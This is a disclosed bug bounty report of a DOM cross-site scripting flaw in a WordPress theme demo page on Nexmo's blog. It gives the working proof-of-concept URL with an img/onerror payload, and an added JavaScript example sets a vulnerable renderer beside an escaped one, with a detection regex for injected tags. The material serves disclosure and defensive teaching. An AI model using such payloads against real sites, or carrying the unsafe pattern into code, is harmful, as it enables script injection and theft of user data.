Cobalt bug bounty program


DOM XSS on Nexmo Blog #CC91_17

Status: Valid | Reporter: dsopas | Category: Cross-Site Scripting (XSS)

Description

I just found that you have a default template on WordPress vulnerable to DOM XSS.

URL

https://www.nexmo.com/blog/wp-content/themes/twentyfifteen/genericons/example.html#1"><img src=x onerror=prompt(1)>

POC

Just go to:
https://www.nexmo.com/blog/wp-content/themes/twentyfifteen/genericons/example.html#1"><img src=x onerror=prompt(1)>

Criticality

This can be used to trick users, steal user data, redirect users to malicious sites and other malicious activities.

Suggested fix

Update the theme or delete the themes that you don't use.

Prerequisites

None

Tools used

Brain

HTTP Request
-
Attachments
nexmo_domxss.jpg
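The report's payload (`1"><img src=x onerror=prompt(1)>`) is the shape you get when a value read from `location.hash` is concatenated into a quoted HTML attribute and then written to a DOM sink. The following is an added illustration, not code from Cobalt, Nexmo, or the Twenty Fifteen theme, and it does not reproduce the theme's actual example.html; the attribute-context sink is an assumption drawn from the payload. It places the vulnerable string-building pattern beside a hardened version that allowlists the fragment and escapes it before it reaches markup, plus a small check a reviewer can run over rendered output.

```javascript
// Added example; not Cobalt's, Nexmo's, or the Twenty Fifteen theme's own code.
// Models the general DOM XSS pattern in the report: an untrusted value from
// location.hash written into markup via an attribute context. The exact sink in
// the theme's example.html is an assumption, not a reproduction of that file.

// Constructed inputs: a benign icon id and the fragment from the report's PoC.
const BENIGN_HASH = "#1";
const REPORT_HASH = '#1"><img src=x onerror=prompt(1)>';

// Vulnerable pattern: the fragment is concatenated straight into HTML that a
// page would then assign to element.innerHTML or pass to document.write().
function renderUnsafe(hash) {
  const id = hash.slice(1); // drop the leading '#'
  return '<a href="#' + id + '" class="icon">' + id + "</a>";
}

// Hardened pattern, part 1: treat the fragment as an identifier and reject
// anything outside a tight allowlist before it reaches any sink.
const SAFE_ID = /^[A-Za-z0-9_-]{1,64}$/;
function parseIconId(hash) {
  const id = hash.startsWith("#") ? hash.slice(1) : hash;
  return SAFE_ID.test(id) ? id : null;
}

// Hardened pattern, part 2: escape for the HTML contexts the value lands in,
// so a later relaxation of the allowlist does not instantly become injection.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function renderSafe(hash) {
  const id = parseIconId(hash);
  if (id === null) return ""; // unknown or malformed fragment: render nothing
  const e = escapeHtml(id);
  return '<a href="#' + e + '" class="icon">' + e + "</a>";
}

// Quick review check over rendered markup: an injected tag or an inline event
// handler attribute indicates the fragment reached the sink unescaped.
function looksInjected(html) {
  return /<img\b|\bon[a-z]+\s*=/i.test(html);
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("unsafe :", renderUnsafe(REPORT_HASH));
  console.log("safe   :", renderSafe(REPORT_HASH) || "(rejected)");
  console.log("benign :", renderSafe(BENIGN_HASH));
}

module.exports = { renderUnsafe, renderSafe, parseIconId, escapeHtml, looksInjected, BENIGN_HASH, REPORT_HASH };
```

The allowlist is the fix that matters for a fragment that is only ever meant to name an icon; the escaping is defence in depth. The reporter's suggested remediation (update or remove unused themes) is still the right operational answer, since shipped demo files like this one are rarely needed on a production site at all.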

Instead of marking this as a duplicate of #CC91_18, I will pay low for both and I will review the rewards moving forward; hope that's ok, and thanks for the report!

nexmo-ops changed state to Valid and granted $50 bounty


dsopas gave feedback

Ok no worries. I agree.
dsopas requested disclosure

nexmo-ops accepted disclosure